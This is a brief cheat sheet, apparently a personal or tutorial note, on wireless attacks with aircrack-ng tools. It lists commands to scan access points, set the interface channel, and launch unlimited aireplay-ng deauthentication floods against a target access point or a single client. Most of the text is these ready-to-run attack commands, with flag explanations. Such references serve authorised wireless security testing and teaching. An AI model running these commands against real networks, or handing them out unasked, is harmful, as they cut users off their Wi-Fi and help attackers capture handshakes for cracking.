aireplay-ng deauthentications and replays

Capture AP information

airodump-ng -i wlan0mon

Change interface channel

iwconfig wlan0mon channel [CHANNEL_NUM]

Launch deauth attacks

# --deauth or -0 | works the same
# --deauth #     | number of deauthentications (0 to infinite)
# -a MAC         | mac address of the target Access Point BSSID
# -c MAC         | mac address of the client associated to target
aireplay-ng --deauth 0 -a [TARGET_BSSID] wlan0mon
aireplay-ng --deauth 0 -a [TARGET_BSSID] -c [TARGET_CLIENT] wlan0mon

More information at: https://tools.kali.org/wireless-attacks/aireplay-ng